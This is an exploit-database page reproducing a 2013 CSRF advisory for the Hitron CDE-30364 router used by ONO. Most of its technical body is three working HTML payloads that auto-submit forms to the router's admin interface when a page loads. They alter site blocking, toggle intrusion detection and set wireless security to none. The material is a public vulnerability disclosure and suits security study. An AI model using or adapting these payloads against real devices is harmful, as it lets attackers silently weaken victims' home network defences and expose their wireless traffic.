header-logo
Suggest Exploit
vendor:
CDE-30364
by:
Matias Mingorance Svensson
N/A
CVSS
N/A
CSRF
CWE
Product Name: CDE-30364
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Hitron Technologies CDE-30364
2013

Router ONO Hitron CDE-30364 – CSRF Vulnerability

The Hitron Technologies CDE-30364 router is prone to CSRF vulnerabilities which allow attackers to change router parameters and perform modifications. The exploit allows enabling/disabling web site blocking and adding new keywords/URLs for blocking. It also allows enabling/disabling the Intrusion Detection System.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO

-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.

The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port
80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters.
The default ip adress of this adsl router, used for management purpose, is
192.168.1.1.

-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>

-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>

-----------------------------------------------------------------------------------------
Many other changes can be performed.


-- 
Un saludo,
Mat�as Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms